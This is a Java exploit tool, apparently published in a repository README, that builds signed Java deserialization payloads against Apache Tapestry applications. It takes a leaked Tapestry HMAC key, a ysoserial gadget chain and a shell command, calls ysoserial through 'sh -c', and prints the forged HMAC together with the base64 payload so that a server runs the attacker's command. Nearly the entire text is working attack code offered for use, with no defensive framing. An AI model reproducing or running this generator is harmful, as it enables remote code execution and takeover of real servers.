README.md
Rendering markdown...
import java.io.*;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import org.apache.commons.codec.binary.Base64;
public class Exploit {
// First arg is tapestry key
// second arg is payload type
private static final String HMAC_SHA1 = "HmacSHA1";
public static String run(String command){
try {
// String command="sh -c $@|sh . echo java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 ls|gzip|base64|tr -d \"\n\"";
String result="";
Process process = Runtime.getRuntime().exec(command);
BufferedReader reader = new BufferedReader(
new InputStreamReader(process.getInputStream()));
String line;
while ((line = reader.readLine()) != null) {
result=result+line;
}
reader.close();
return result ;
}
catch (IOException e) {
e.printStackTrace();
return "ERROR";
}
}
public static void main(String[] args) {
if( args.length <3)
{
System.out.println("[Usage]: java -cp commons-codec-1.15/commons-codec-1.15.jar:. Exploit [Tapestry Key] [Ysoserial Payload] [Command To Execute]");
System.exit(0);
}
Mac sha1Hmac;
byte[] result;
final String key = args[0];
final String type= args[1];
final String command="sh -c $@|sh . echo "+args[2];
try {
final byte[] byteKey = key.getBytes(StandardCharsets.UTF_8);
sha1Hmac = Mac.getInstance(HMAC_SHA1);
SecretKeySpec keySpec = new SecretKeySpec(byteKey, HMAC_SHA1);
sha1Hmac.init(keySpec);
String ysoCommand="sh -c $@|sh . echo java -jar ysoserial-master-d367e379d9-1.jar "+type+" '"+command+"'|gzip|base64|tr -d \"\n\"";
String payload=run(ysoCommand);
byte[] array = payload.getBytes();
byte[] b64out=Base64.decodeBase64(array);
sha1Hmac.update(b64out);
byte[] macData = sha1Hmac.doFinal();
result = Base64.encodeBase64(macData);
System.out.println(new String(result)+":"+payload);
} catch ( InvalidKeyException | NoSuchAlgorithmException e) {
e.printStackTrace();
} finally {
// Put any cleanup here
System.out.println("Payload generated successfully!\nAuthor: Kahla");
}
}
}